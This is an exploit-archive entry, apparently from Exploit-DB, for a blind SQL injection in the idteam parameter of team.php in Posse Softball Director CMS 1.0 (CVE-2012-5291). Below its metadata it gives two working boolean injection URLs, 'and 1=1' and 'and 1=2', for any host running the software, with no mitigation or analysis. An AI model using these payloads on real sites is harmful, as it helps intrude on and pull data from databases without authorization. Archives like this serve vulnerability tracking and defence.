EXPLOITS

Posse Softball Director CMS - 'team.php' Blind SQL Injection

Author: Easy Laster
type: webapps
platform: php
port: 
date_added: 2012-01-04  
date_updated: 2012-01-04  
verified: 1  
codes: OSVDB-82483;CVE-2012-5291  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 18320.txt  

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
 ~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php  ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

    team.php?idteam=

[+] Exploitable

    http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
    http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false